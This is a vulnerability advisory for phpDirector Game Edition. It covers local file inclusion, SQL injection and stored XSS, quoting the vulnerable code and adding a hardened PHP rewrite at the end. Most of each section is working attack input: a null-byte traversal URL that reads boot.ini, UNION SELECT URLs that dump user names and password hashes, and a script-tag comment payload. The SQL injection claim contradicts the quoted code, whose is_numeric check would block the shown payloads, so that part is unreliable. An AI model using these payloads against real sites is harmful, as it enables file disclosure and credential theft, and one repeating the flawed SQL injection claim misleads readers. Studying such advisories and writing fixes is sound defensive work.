Local File Inclusion
header.php vulnerable code
-----------------------------
if(!$_GET["lang"])
{
    include("lang/".config('lang'));
}
else
{
    // the unvalidated GET value is stored in the cookie as-is
    SetCookie("lang",$_GET["lang"]);
    // no exit() after the redirect, so the code below still runs on this request
    header('Location: ' . $_SERVER['HTTP_REFERER'] );
}
if (!$_COOKIE["lang"])
{
    include("lang/".config('lang'));
}
else
{
    // the cookie value is concatenated into the include path with no validation
    $lang = $_COOKIE["lang"];
    include("lang/" . $lang . ".inc.php");
}
-------------------------------
Exploit:
http://site.com/path/header.php?lang=[LFI]
Sample (tested on a Windows box):
http://localhost/phpdirectorgameedition/header.php?lang=../../../../boot.ini%00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SQL Injection
Page: games.php, vulnerable code (line 12 and lines 121-128)
-----------------------------------------
// line 12
$idc = $_GET["id"];
// lines 121-128
if(isset($idc) && is_numeric($idc)){
    $id = mysql_real_escape_string($idc);
    // $id is interpolated unquoted into the query string
    $result = mysql_query("SELECT * FROM pp_files WHERE id=$id AND `approved` = '1' LIMIT 1") or die(mysql_error());
}else{
    $result = mysql_query("select * from pp_files WHERE approved='1' AND reject='0' order by rand() LIMIT 1") or die(mysql_error());
}
-----------------------------------
Exploit:
http://site/games.php?id=-1 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
http://site/games.php?id=-1 UNION SELECT 1,group_concat(id,0x3a,user,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from pp_user--
Example:
DB version:
http://localhost/phpdirectorgameedition/games.php?id=-1 UNION SELECT 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
Users:
http://localhost/phpdirectorgameedition/games.php?id=-1 UNION SELECT 1,group_concat(id,0x3a,user,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from pp_user--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
XSS (Cross-Site Scripting)
You can even use an XSS shell on this vuln.
Go to this page:
http://localhost/phpdirectorgameedition/games.php?id=1
In the comment form put "<script>alert("XSS")</script>" and then submit the comment.
Vulnerable code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
if(isset($_POST['go']) && !empty($_POST['comment']) && !empty($_POST['nom']))
{
    // comment only gets addslashes() (SQL quoting, no HTML encoding); id and nom are not escaped at all
    mysql_query("INSERT INTO pp_comment (file_id, nom, comment,ip) VALUES ('$_POST[id]', '$_POST[nom]','".addslashes($_POST['comment'])."','$ip')");
}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
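A hardened counterpart to the three snippets above, added here as an example and not phpDirector's own code. It assumes PHP 7.1+, a PDO handle named $pdo, the pp_files and pp_comment tables from the advisory and an assumed allowlist of language files: the lang value is checked against a fixed list before it is stored or included, the id is bound as an integer parameter, and comment text is HTML-encoded when rendered instead of addslashes()'d when stored.

```php
<?php
// Added hardening example for the three issues in this advisory; not phpDirector's own code.
// Assumed: a PDO handle $pdo and the pp_files / pp_comment tables named in the advisory.

// header.php: pick the language file from a fixed allowlist instead of the raw cookie value.
const ALLOWED_LANGS = ['en', 'fr', 'de'];   // assumed list; only names of files you actually ship

function resolveLangFile($requested, string $default = 'en'): string
{
    $lang = in_array($requested, ALLOWED_LANGS, true) ? $requested : $default;
    return __DIR__ . '/lang/' . $lang . '.inc.php';   // traversal and %00 can never reach here
}

if (isset($_GET['lang'])) {
    $lang = in_array($_GET['lang'], ALLOWED_LANGS, true) ? $_GET['lang'] : 'en';
    setcookie('lang', $lang, 0, '/', '', false, true);   // store only a validated value, HttpOnly
    header('Location: index.php');                       // fixed target instead of HTTP_REFERER
    exit;                                                // stop here; the original kept executing
}
include resolveLangFile($_COOKIE['lang'] ?? '');

// games.php: bind the id as an integer parameter instead of interpolating it into the SQL.
function fetchApprovedFile(PDO $pdo, $rawId): ?array
{
    if (!ctype_digit((string) $rawId)) {
        return null;                                     // anything but a plain positive integer is refused
    }
    $stmt = $pdo->prepare('SELECT * FROM pp_files WHERE id = :id AND approved = 1 LIMIT 1');
    $stmt->execute([':id' => (int) $rawId]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// comment handler: prepared INSERT (no addslashes) and HTML encoding on output, not on storage.
function insertComment(PDO $pdo, int $fileId, string $nom, string $comment, string $ip): void
{
    $stmt = $pdo->prepare('INSERT INTO pp_comment (file_id, nom, comment, ip) VALUES (?, ?, ?, ?)');
    $stmt->execute([$fileId, $nom, $comment, $ip]);
}

function renderComment(array $c): string
{
    $nom     = htmlspecialchars($c['nom'],     ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $comment = htmlspecialchars($c['comment'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<p><b>' . $nom . '</b>: ' . $comment . '</p>';   // <script> becomes &lt;script&gt;
}
```

With these changes the sample requests in the advisory fall back to the default language, return no row, or render the script tag as inert text.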